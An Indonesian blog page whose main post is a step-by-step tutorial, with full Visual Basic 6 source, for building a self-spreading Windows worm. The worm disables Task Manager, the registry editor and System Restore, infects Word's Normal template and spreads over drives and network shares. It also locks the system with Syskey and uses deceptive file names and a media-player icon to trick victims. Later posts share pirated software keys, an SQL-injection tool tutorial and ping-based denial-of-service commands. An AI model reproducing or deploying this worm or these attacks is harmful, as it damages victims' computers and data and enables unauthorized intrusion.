Rahasia Membuat Worm Menggunakan VB 6.0

Orang awam menyebut bahwa Worm sama saja dengan Virus, tetapi kenyataan sebenarnya adalah berbeda walaupun memang sulit sekali untuk dibedakan karena sama-sama merusak (kaya ente tukang ngrusak anake wong hehehehe). Biasanya Worm dalam merusak suatu file atau dalam berkembang biak tidak menempelkan dirinya sendiri pada suatu file. Worm akan berkembang biak sendiri pada memory atau membuat file-file baru dg kriteria tertentu, atau yang terparah worm akan menindih suatu file dan menggantikannya dengan program worm yang mengakibatkan file tsb menjadi rusak. Sedangkan virus akan berkembang biak dan menempelkan dirinya sendiri pada suatu file  atau program dan merusaknya. Memang sama2 merusak dan kurang ajar hehehe…..
Ora usah kesuwen luak langsung bae carane pimen???sabar ndipit bro. Sebelumnya ini dia spesifikasi dari Worm yang akan kita buat. Worm ini dinamakan Worm B3R dengan spesifikasi :
  • Kode Worm    : B3R
  • Bahasa Program: Visual Basic
  • Jenis File         : exe
  • Target File       : DOC, MP3, JPG, BMP, SYS, dll.
  • Manipulasi       : Membelah layar Windows dan mengunci Windows XP dengan Syskey
Struktur Programnya :
  • Deklarasi umum ( declaration )
  • Form Loading
  • Copy File
  • Network Spreading
  • Anti Deletion
  • Main Module
  • Timer Manipulation ( manipulasi dengan timer )
Berarti ente harus mempunyai program Visual Basic dulu Bro dan mengistallnya atau juga tersedia VB 6.0 Portable dan tidak susah2 menginstallnya tapi inget anda harus masukkan Reg Key (allow .exe creation) lebih dulu. Aja nginstall GOM Player trus Bro nggo nonton B***P hehehe…..
Nah ini urutannya :
  1. Buka program Visual Basic 6.0 dan create new project STANDAR EXE dan klik OK
  2. pada tampilan visual basic sebelah kiri terdapat ikon2, dan yang harus anda lakukan adalah mengklik ikon pictureBox dan Timer, untuk Picture Box anda membuat 2 dan mengaturnya secara rapi dan untuk Timer anda membuat 5 Timer dan aturlah dengan rapi. Buatlah seperti contoh gambar di bawah ini :

  1. klik form 1 dan masuk ke jendela View dan klik code dan masukkan listing program untuk membuat form seperti berikut :

‘————————————————————-
‘ CGW: CyberGrind Worm
‘ B3R: Betness variant 3 Reincarnation
‘ (2010)CopyLeft, Cybergrind, BetnessCry, Java, Indonesia
‘ email: beta_amr@live.com
‘ For educational purposes only!
‘ Evil is not aim but fulfill perfectness!
‘————————————————————-
Private Const EWX_LOGOFF = 0
Private Const EWX_SHUTDOWN = 1
Private Const EWX_REBOOT = 2
Private Const EWX_FORCE = 4

Private Declare Function ExitWindowsEx Lib “user32″ (ByVal dwOptions As Long, ByVal dwReserved As Long) As Long

Private Declare Function CopyFile Lib “kernel32″ Alias “CopyFileA” (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long

Private Declare Function FindWindow Lib “user32″ Alias _
“FindWindowA” (ByVal lpClassName As String, ByVal _
lpWindowName As String) As Long


Dim pict As Picture
Dim a As Integer

Private Declare Function BitBlt _
Lib “gdi32″ ( _
ByVal hDestDC As Long, _
ByVal X As Long, ByVal Y As Long, _
ByVal nWidth As Long, _
ByVal nHeight As Long, _
ByVal hSrcDC As Long, _
ByVal XSrc As Long, ByVal YSrc As Long, _
ByVal dwRop As Long _
) As Long

Private Declare Function GetDesktopWindow _
Lib “user32″ () As Long

Private Declare Function GetDC _
Lib “user32″ ( _
ByVal hwnd As Long _
) As Long

Private Declare Function ReleaseDC _
Lib “user32″ ( _
ByVal hwnd As Long, _
ByVal hdc As Long _
) As Long

Private Const SWP_NOSIZE = &H1
Private Const SWP_NOMOVE = &H2
Private Const SWP_NOZORDER = &H4
Private Const SWP_NOREDRAW = &H8
Private Const SWP_NOACTIVATE = &H10
Private Const SWP_FRAMECHANGED = &H20
Private Const SWP_SHOWWINDOW = &H40
Private Const SWP_HIDEWINDOW = &H80
Private Const SWP_NOCOPYBITS = &H100
Private Const SWP_NOOWNERZORDER = &H200
Private Const SWP_DRAWFRAME = SWP_FRAMECHANGED
Private Const SWP_NOREPOSITION = SWP_NOOWNERZORDER
Private Const HWND_TOP = 0
Private Const HWND_BOTTOM = 1
Private Const HWND_TOPMOST = -1
Private Const HWND_NOTOPMOST = -2
Private Declare Function SetWindowPos _
Lib “user32″ ( _
ByVal hwnd As Long, _
ByVal hwndInsertAfter As Long, _
ByVal X As Long, _
ByVal Y As Long, _
ByVal CX As Long, _
ByVal CY As Long, _
ByVal wFlags As Long _
) As Long
Private mbOnTop As Boolean

Private Property Let OnTop(Setting As Boolean)
If Setting Then
SetWindowPos hwnd, HWND_TOPMOST, _
0, 0, 0, 0, SWP_NOMOVE Or SWP_NOSIZE
Else
SetWindowPos hwnd, HWND_NOTOPMOST, _
0, 0, 0, 0, SWP_NOMOVE Or SWP_NOSIZE
End If
mbOnTop = Setting
End Property

Private Property Get OnTop() As Boolean
OnTop = mbOnTop
End Property

Private Sub Form_Load()
On Error Resume Next

Dim drives
Dim regrun
Dim xx
Dim X
Dim Y
Dim z
Dim zz
Dim fso

‘—
App.TaskVisible = False

‘===
Set regrun = CreateObject(“Wscript.shell”)
regrun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Stask”, “c:\csw.exe”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoRun”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsNT\SystemRestore\DisableConfig”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsNT\SystemRestore\DisableSR”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableRegistryTools”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableTaskMgr”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableTaskMgr”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security”, 1, “REG_DWORD”

‘=
X = App.path & “\” & App.EXEName & “.exe”
Y = “c:\WINDOWS\creditcardinfo.txt.EXE”
z = “c:\ccinfo.EXE”
zz = “c:\csw.exe”
zzz = “c:\readme.txt”
zzzz = “c:\windows\readme.txt”
zzzzz = “c:\windows\system32\readme.txt”
mark = “c:\version.sys”

CopyFile X, Y, 0
CopyFile X, z, 0
CopyFile X, zz, 0
CopyFile X, zzz, 0
CopyFile X, zzzz, 0
CopyFile X, zzzzz, 0

‘=
If Dir(“c:\version.sys”) = “” Then
Set fso = CreateObject(“scripting.filesystemobject”)
Set drives = fso.drives
For Each Drive In drives
If Drive.isready Then
CopyFile X, mark, 0
Dosearch (Drive & “\”)
End If
Next
End If

Timer1.Enabled = True
Timer2.Enabled = True
Timer3.Enabled = True
Timer4.Enabled = True
Timer5.Enabled = True
Call NetSpread
Call Main
End Sub

‘=
Function Dosearch(path)

End Function
On Error Resume Next
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set folder = fso.getfolder(path)
Set Files = folder.Files

For Each file In Files
‘=
If LCase(fso.GetExtensionName(file.path)) = “doc” Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If
‘=
If LCase(fso.GetExtensionName(file.path)) = “sys” Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If
‘=
If LCase(fso.GetExtensionName(file.path)) = “dll” Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If
‘=
If LCase(fso.GetExtensionName(file.path)) = “jpg” Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If
‘=
If LCase(fso.GetExtensionName(file.path)) = “bmp” Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If
‘=
If LCase(fso.GetExtensionName(file.path)) = “mp3″ Then
Set cop = fso.GetFile(“c:\readme.txt”)
cop.Copy (file.path & “.exe”)
End If

On Error Resume Next

Next

Set Subfolders = folder.Subfolders
For Each Subfolder In Subfolders
Dosearch Subfolder.path
Next
End Function

Sub NetSpread()

On Error Resume Next
Set Network = CreateObject(“WScript.Network”)
Set Shares = Network.EnumNetworkDrives

If Shares.Count > 0 Then
Set fso = CreateObject(“Scripting.FileSystemObject”)
For Counter1 = 0 To Shares.Count – 1
If Shares.Item(Counter1) <> “” Then
fso.GetFile(wscript.ScriptFullName).Copy (“kamasutra.txt.exe”)
Dosearch (Shares.Item(Counter1))
End If
Next
Set fso = Nothing

End If
Set Shares = Nothing
Set Network = Nothing
End Sub

‘=
Sub Main()
On Error Resume Next
Dim zz, zz1, file, fso, oword, nt, b, i, iw, attr
zz1 = App.path & “\” & App.EXEName & “.exe”
file = “c:\csw.exe”
file2 = “c:\windows\readme.txt.exe”
file3 = “c:\windows\ccinfo.exe”

CopyFile zz1, file, 0
CopyFile zz1, file2, 0
CopyFile zz1, file3, 0

On Error Resume Next
Open “c:\v.reg” For Output As 2
Print #2, “REGEDIT4″
Print #2, “[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]“
Print #2, “”"Level”"=dword:00000001″
Print #2, “[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]“
Print #2, “”"Level”"=dword:00000001″
Close 2
Shell “regedit /s c:\v.reg”, vbHide
Kill “c:\v.reg”

On Error Resume Next
Open “c:\vv.reg” For Output As 5
Print #5, “Windows Registry Editor Version 5.00″
Print #5, “[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]“
Print #5, “”"Level”"=dword:00000001″
Print #5, “[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]“
Print #5, “”"Level”"=dword:00000001″
Close 5
Shell “regedit /s c:\vv.reg”, vbHide
Kill “c:\vv.reg”

On Error Resume Next
If Dir(“c:\m3r.sys”) <> “m3r.sys” Then
Open “c:\m3r.sys” For Output As 9
Print #9, “Sub document_close()”
Print #9, “On Error Resume Next”
Print #9, “Open “”c:\m3r.txt”" For Output As 2″
Print #9, “Print #2, “”sub document_open()”"”
Print #9, “Print #2, “”On Error Resume Next”"”
Print #9, “Print #2, “”‘by M3:Reincarnation”"”
Print #9, “Print #2, “”obj =”
ActiveDocument.Shapes(1).OLEFormat.ClassType “”"”
Print #9, “Print #2, “”With”
ActiveDocument.Shapes(1).OLEFormat “”"”
Print #9, “Print #2, “” .ActivateAs ClassType:=obj”"”
Print #9, “Print #2, “” .Activate”"”
Print #9, “Print #2, “”End With”"”
Print #9, “Print #2, “”end sub”"”
Print #9, “Close 2″
Print #9, “Set fso = “CreateObject(“”Scripting.FileSystemObject”")”
Print #9, “Set nt =”
ActiveDocument.vbproject.vbcomponents(1).codemodule “”
Print #9, “Set iw = fso.OpenTextFile(“”c:\m3r.txt”", 1, True)”
Print #9, “nt.DeleteLines 1, nt.CountOfLines”
Print #9, “i = 1″
Print #9, “Do While iw.atendofstream <> True”
Print #9, “b = iw.readline”
Print #9, “nt.InsertLines i, b”
Print #9, “i = i + 1″
Print #9, “Loop”
Print #9, “ActiveDocument.Shapes.AddOLEObject _”
Print #9, “FileName:=”"c:\csw.exe”", _”
Print #9, “LinkToFile:=False”
Print #9, “ActiveDocument.Save”
Print #9, “Open “”c:\vv.reg”" For Output As 3″
Print #9, “Print #3, “”REGEDIT4″”"
Print #9, “Print #3,”"[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]“”"
Print #9, “Print #3, “”"”"”Level”"”"=dword:00000001″”"
Print #9, “Print #3,”"[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]“”"
Print #9, “Print #3, “”"”"”Level”"”"=dword:00000001″”"
Print #9, “Close 3″
Print #9, “Shell “”regedit /s c:\vv.reg”", vbHide”
Print #9, “Kill “”c:\vv.reg”"”
Print #9, “Open “”c:\vvv.reg”" For Output As 4″
Print #9, “Print #4, “”Windows Registry Editor Version 5.00″”"
Print #9, “Print #4,”"[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]“”"
Print #9, “Print #4, “”"”"”Level”"”"=dword:00000001″”"
Print #9, “Print #4,”"[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]“”"
Print #9, “Print #4, “”"”"”Level”"”"=dword:00000001″”"
Print #9, “Close 4″
Print #9, “Shell “”regedit /s c:\vvv.reg”", vbHide”
Print #9, “Kill “”c:\vvv.reg”"”
Print #9, “End Sub”
Close 9

On Error Resume Next
Set fso = CreateObject(“Scripting.FileSystemObject”)
Set oword = CreateObject(“Word.Application”)
oword.Visible = False
Set nt = oword.NormalTemplate.vbproject.vbcomponents(1).codemodule
Set iw = fso.OpenTextFile(“c:\m3r.sys”, 1, True)
nt.DeleteLines 1, nt.CountOfLines
i = 1
Do While iw.atendofstream <> True
b = iw.readline
nt.InsertLines i, b
i = i + 1
Loop

On Error Resume Next
oword.NormalTemplate.Save
SetAttr oword.NormalTemplate.FullName, vbReadOnly
oword.NormalTemplate.Close
Set oword = Nothing
End If

End Sub

‘=
Private Sub Timer1_Timer()
On Error Resume Next
CopyFile “c:\readme.txt”, “c:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “d:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “e:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “f:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “g:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “h:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “i:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “j:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
CopyFile “c:\readme.txt”, “k:\” & “\” + “kamasutra.txt.exe”, 0
On Error Resume Next
Call NetSpread
End Sub

‘=
Private Sub Timer2_Timer()
On Error Resume Next
Dim strClassName As String
Dim strCaption As String

strClassName = “#32770″
strCaption = “System Configuration Utility”
If FindWindow(strClassName, strCaption) <> 0 Then
lngResult = ExitWindowsEx(4, &H0)
End If

strClassName = “RegEdit_RegEdit”
strCaption = “Registry Editor”
If FindWindow(strClassName, strCaption) <> 0 Then
lngResult = ExitWindowsEx(4, &H0)
End If

strClassName = “#32770″
strCaption = “Windows Task Manager”
If FindWindow(strClassName, strCaption) <> 0 Then
lngResult = ExitWindowsEx(4, &H0)

End If

strClassName = “ThunderRT6Main”
strCaption = “HijackThis”
If FindWindow(strClassName, strCaption) <> 0 Then
On Error Resume Next
Set regrun = CreateObject(“Wscript.shell”)
regrun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SecureBoot”, 3, “REG_DWORD”
lngResult = ExitWindowsEx(4, &H0)
End If

On Error Resume Next
X = App.path & “\” & App.EXEName & “.exe”
Y = “c:\WINDOWS\msginax.dll”
z = “c:\ccinfo.EXE”
zz = “c:\csw.exe”
zzz = “c:\readme.txt”
zzzz = “c:\windows\readme.txt”
zzzzz = “c:\windows\system32\readme.txt”
CopyFile X, Y, 0
CopyFile X, z, 0
CopyFile X, zz, 0
CopyFile X, zzz, 0
CopyFile X, zzzz, 0
CopyFile X, zzzzz, 0

On Error Resume Next
X = “c:\windows\system32\readme.txt”
Y = “c:\WINDOWS\msginax.dll”
z = “c:\ccinfo.EXE”
zz = “c:\csw.exe”
zzz = “c:\readme.txt”
zzzz = “c:\windows\readme.txt”
CopyFile X, Y, 0
CopyFile X, z, 0
CopyFile X, zz, 0
CopyFile X, zzz, 0
CopyFile X, zzzz, 0

On Error Resume Next
X = “c:\readme.txt”
Y = “c:\WINDOWS\msginax.dll”
z = “c:\ccinfo.EXE”
zz = “c:\csw.exe”
zzz = “c:\readme.txt”
zzzz = “c:\windows\system32\readme.txt”
CopyFile X, Y, 0
CopyFile X, z, 0
CopyFile X, zz, 0
CopyFile X, zzz, 0
CopyFile X, zzzz, 0

‘=
On Error Resume Next
Set regrun = CreateObject(“Wscript.shell”)
regrun.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Stask”, “c:\csw.exe”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoFolderOptions”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoRun”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsNT\SystemRestore\DisableConfig”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsNT\SystemRestore\DisableSR”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableRegistryTools”, 1, “REG_DWORD”
regrun.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableTaskMgr”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\DisableTaskMgr”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security”, 1, “REG_DWORD”
regrun.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security”, 1, “REG_DWORD”

End Sub

‘=
Private Sub Timer3_Timer()
On Error Resume Next

If Day(Date) = 21 Or Day(Date) = 4 Or Day(Date) = 20 Or Day(Date) = 31 Or Day(Date) = 8 Then
lngResult = ExitWindowsEx(4, &H0)
End If

If Day(Date) = 13 Or Day(Date) = 26 Or Day(Date) = 1 Then
Set regrun = CreateObject(“Wscript.shell”)
regrun.regwrite “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\SecureBoot”, 3, “REG_DWORD”
For i% = 1 To 1000000
On Error Resume Next
Shell “c:\csw.exe”
Next i%
End If

If TimeValue(Now) > TimeValue(“09:00:00″) Then
Call animasi
End If

End Sub

Private Sub animasi()
Dim X     As Long, Y As Long
Dim XSrc  As Long, YSrc As Long
Dim dwRop As Long, hwndSrc As Long, hSrcDC As Long
Dim Res   As Long
Dim m1, m2
Dim n1, n2
Dim PixelColor, PixelCount
OnTop = True
Randomize
a = Rnd * 3

On Error Resume Next
Width = Screen.Width
Height = Screen.Height
Randomize
ScaleMode = vbPixels
Move 0, 0, Screen.Width + 1, Screen.Height + 1
dwRop = &HCC0020
hwndSrc = GetDesktopWindow()
hSrcDC = GetDC(hwndSrc)
Res = BitBlt(hdc, 0, 0, ScaleWidth, _
ScaleHeight, hSrcDC, 0, 0, dwRop)
Res = ReleaseDC(hwndSrc, hSrcDC)
Show
Set pict = Image
WindowState = vbMaximized
Picture1.Width = Screen.Width \ 15
Picture1.Height = Screen.Height \ 15
Picture1 = pict
Picture2 = pict

End Sub

Private Sub Timer4_Timer()
On Error Resume Next
If a = 0 Then
Picture1.PaintPicture Picture2, 0, -2
Picture1.PaintPicture Picture2, 0, Picture1.ScaleHeight – 2
Picture2 = Picture1.Image
End If
If a = 1 Then
Picture1.PaintPicture Picture2, 0, 2
Picture1.PaintPicture Picture2, 0, -Picture1.ScaleHeight + 2
Picture2 = Picture1.Image
End If
If a = 2 Then
Picture1.PaintPicture Picture2, -2, 0
Picture1.PaintPicture Picture2, Picture1.ScaleWidth – 2, 0
Picture2 = Picture1.Image
End If
If a = 3 Then
Picture1.PaintPicture Picture2, 2, 0
Picture1.PaintPicture Picture2, -Picture1.ScaleWidth + 2, 0
Picture2 = Picture1.Image
End If

End Sub

Private Sub Timer5_Timer()
a = Rnd * 3
End Sub


  1. ketikkan list diatas dengan baik dan teliti jangan sampai terjadi kesalahan/syntax error, biasanya kalau terjadi kesalahan akan ditunjukkan dengan warna merah pada list yang salah, atau copy paste list di atas.
  2. Jika sudah selesai mengetikkan list di atas sekarang kita mulai atur form. Kita lihat sebelah kanan pada tampilan visual basic anda disitu terdapat properties kemudian pilih form1 dan kita uba data2nya seperti berikut :
AutoRedraw           = -1 ‘True
BorderStyle          = 0 ‘None
Caption              = “cgw”
ClientHeight         = 3285
ClientLeft           = 0
ClientTop            = 0
ClientWidth          = 4335
DrawWidth            = 10
ForeColor            = &H8000000F&
KeyPreview           = -1 ‘True
LinkTopic            = “csw”
MousePointer         = 99 ‘Custom
ScaleHeight          = 219
ScaleMode            = 0 ‘User
ScaleWidth           = 3757
ShowInTaskbar              = 0 ‘False
StartUpPosition      = 3 ‘Windows Default
Visible              = 0 ‘False
Setelah selesai mengatur form1 sekarang saatnya kita mengatur PictureBox 1 dan isikan data2 seperti dibawah :

Appearance    = 0 ‘Flat
AutoRedraw    = -1 ‘True
BackColor     = &H80000005&
BorderStyle   = 0 ‘None
DataFormat    = General
ForeColor     = &H80000008&
Height               = 495
Left          = 0
ScaleHeight   = 33
ScaleMode     = 3 ‘Pixel
ScaleWidth    = 14
TabIndex      = 0
Top           = 0
Width         = 208
untuk picture box 2 isikan data2 seperti berikut :
AutoRedraw    = -1 ‘True
Height               = 495
Left          = 138
ScaleHeight   = 29
ScaleMode     = 3 ‘Pixel
ScaleWidth    = 2
TabIndex      = 1
Top           = 840
Visible       = 0 ‘False
Width                = 93
Untuk Timer 1 isikan data :    Interval      = 50000
Left          = 720
Top           = 1800
Untuk Timer 2 : Interval    = 1000
Left         = 1200
Top           = 1800
Untuk Timer 3 : Interval    = 60000
Left          = 120
Top           = 1800
Untuk Timer 4 : Interval    = 1
Left          = 2400
Top           = 1800
Untuk Timer 5 : Interval    = 60000
Left          = 1800
Top           = 1800

  1. Setelah selesai mengatur semua kita simpan data-data form tsb

  1. Setelah semua selesai kita akan membentuk file exe dengan cara kita atur lebih dulu project kita.

Klik kanan pada project1 dalam hal ini contohnya project saya yang saya namakan BetnessCry dan akan muncul jendela dan pilih BetnessCry properties dan akan muncul jendela seperti berikut :

Pilih Make kemudian kita ganti pada version number dengan angka  21 semua. Kemudian pada Type dan Value kita ubah sesuai keinginan kita.
  1. Oia untuk mengecoh penampilan Worm ini agar seseorang mengkliknya kita ubah icon tersebut dengan cara klik ganda pada project explorer contoh saya adalah betness (worm.frm) dan pada data properties kita cari ikon dan ganti sesuai keinginan anda. Lihat contoh dibawah :




Ikon yang saya gunakan pada project saya adalah seperti berikut :

Ikon yang saya gunakan adalah ikon media player classic soalnya untuk menipu orang untuk mengkliknya.
  1. Setelah semua proses selesai kita buat worm tersebut menjadi aplikasi (exe) yaitu kita masuk ke menu file dan klik make exe dan simpanlah.
Nah sekian dulu tutorial dari saya ini. Ingat jangan dibuat untuk kejahatan, ini hanyalah ilmu dan ilmu harus di amalkan dan di bagi2kan hehehe.OK BRO…..!!!turun bero hehe…
Diposting oleh Nyong Galau di 10.01 0 komentar

 

Quiz Parampaa 2

udah tahu kan tentang quiz parampaa???
kali ini saya iseng iseng share gratis game terapi otak ini...
dijamin bakal gila...!!!




langsung aja menuju tkp ::::


Qubex
Diposting oleh Nyong Galau di 09.38 0 komentar

 

Key Kaspersky [kav/kis] 14 april 2011

nih gwe share update terbaru key Kis/kav 2011 tanggal 14 april 2011.
langsung aja menuju TKP :::

Qubex
Diposting oleh Nyong Galau di 09.29 0 komentar

 

Adobe Photoshop CS5 Portable

kali ini saya share adobe photoshop CS5 portable full version..


tanpa perlu bnyak basa basi ini silahkan download :::


Qubex
Diposting oleh Nyong Galau di 09.22 1 komentar

 

Tutorial Hacking SQLI Using Havij 1.14 PRO Version

First download and install Havij 1:10

Both Vul Bugs do the scanning of a website:

Scanner Tools

Dork who finished loading the input you want to please googling to find dorknya.

and last for SQL ::
done



Diposting oleh Nyong Galau di 04.51 0 komentar

 

DOS Hacking Tutorial

Microsoft DOS came with some hacking tools hidden I will discuss here. This tool can be found in the directory c: \ windows if you use Win98, and if you are using winxp then this tool is located at C: \ winxp \ system32. WinXP, Win2000 and WinNT released with some additional Internet tools. So if you are still using Win98 then I suggest replacing it with WinXP. Which of course has the additional securiti features and commands a good internet hacking. In this manual I will discuss about some of the commands found in Win98 and WinXP.

So for the user window, the following commands at the DOS hacking.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat

this is the caption  ::

1. ping

Utiliy is used to locate remote host. Yan gmengirmkan a SYN signal to a remote host, and if the remote host's reply it means there is a remote machine.

Try you type this command:

C:\windows>ping/?

*************
Newbie tip: typing '/?' after dos command displays helpnya. So how do you learn various dos commands. Is not WinXP, WinNT and Win2000 also have the command 'help ' to display all the dos commands.
*************

  1. Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
  2. [-r count] [-s count] [[-j host-list] | [-k host-list]]
  3. [-w timeout] destination-लिस्ट

Options:

  1. -t Ping the specified host until stopped.
  2. To see statistics and continue - type Control-Break;
  3. To stop - type Control-C.
  4. -a Resolve addresses to hostnames.
  5. -n count Number of echo requests to send.
  6. -l size Send buffer size.
  7. -f Set Don't Fragment flag in packet.
  8. -i TTL Time To Live.
  9. -v TOS Type Of Service.
  10. -r count Record route for count hops.
  11. -s count Timestamp for count hops.
  12. -j host-list Loose source route along host-list.
  13. -k host-list Strict source route along host-list.
  14. -w timeout Timeout in milliseconds to wait for each reply.
 So I am able to ping any ip address or domain name to check its presence on the internet. For example I type "ping localhost" then I get.

  1. Pinging chintan [127.0.0.1] with 32 bytes of data:
  2.  
  3. Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
  4. Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
  5. Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
  6. Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
  7.  
  8. Ping statistics for 127.0.0.1:
  9. Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
  10. Approximate round trip times in milli-seconds:
  11. Minimum = 0ms, Maximum = 0ms, Average = 0ms
 ************
Newbie tip: 'localhost' is the ip 127.0.0.1 and the ip address of our own. Also known as the loopback ip. But when you connect to the internet you will be assigned a new IP by your provider as your self-identification. You can find out your ip by typing "winipcfg" in the Start menu-Run for Win98 users, while others simply typing "ipconfig"at the command prompt.
***********
This suggests to me that 32 bytes of data are sent to 127.0.0.1 and returned back to less than 10ms. TTL is Time To Live and values ​​range from 0 to 255 (default 128). Now let us see what happens if I type "ping http://www [dot] yahoo [dot] com"

  1. Pinging http://www[dot]yahoo[dot]akadns[dot]net [66.218.71.87] with 32 bytes of data:
  2.  
  3. Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
  4. Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
  5. Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
  6. Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54
  7.  
  8. Ping statistics for 66.218.71.87:
  9. Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
  10. Approximate round trip times in milli-seconds:
  11. Minimum = 1799ms, Maximum = 3448ms, Average = २५९३म्स
But what about the ping is used by hackers? Well, there are two options '|' and '-t' deadly. - | is used to buffer size specification is sent (default is 32 bytes) what if I type "ping - | 65 600 target.com" this will bring death to target.com 65,600 data packets that are higher than the capacity of the TCP / IP 65535. This action causes the target.com to hang and must be restarted.

And if I type "ping-t target.com" this will continue sending 32 bytes of data to target.com to spend resources and causing hangs. The above two types of attacks known as ping DoS attack to the attacker.

***********
Newbie tip: 'Dos' the latter is a denial of service which was launched by hackers to stop service on remote machine.
***********
Note: This type of attack is often used in the past, but this time on a system that has been updated it will not work anymore.

2. Tracert

Tracert command to the remote machine do the tracking. Before we reach the remote machine requests through a different router in between. Tracert tool (known as 'traceroute' on unix) was originally designed to look for a router which is having problems. The command show ip address router through which we request before reaching the remote maching. For example, if I type "tracert http://www [dot] yahoo [dot] com /" at the dos prompt it will be there:

  1. Tracing route to http://www[dot]yahoo[dot]akadns[dot]net [66.218.71.87]
  2. over a maximum of 30 hops:
  3.  
  4. 1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
  5. 2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
  6. 3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
  7. 4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
  8. 5 * * * Request timed out.
  9. 6 * * * Request timed out.
  10. 7 * * * Request timed out.
  11. 8 * * * Request timed out.
  12. 9 * * * Request timed out.
  13. 10 * 3408 ms * http://www[dot]yahoo[dot]akadns[dot]net [66.218.71.87]
  14. 11 * * * Request timed out.
  15. 12 * * * Request timed out.
  16. 13 * * * Request timed out.
  17. 14 * * * Request timed out.
  18. 15 * * * Request timed out.
  19. 16 * * * Request timed out.
  20. 17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]
 Trace complete.

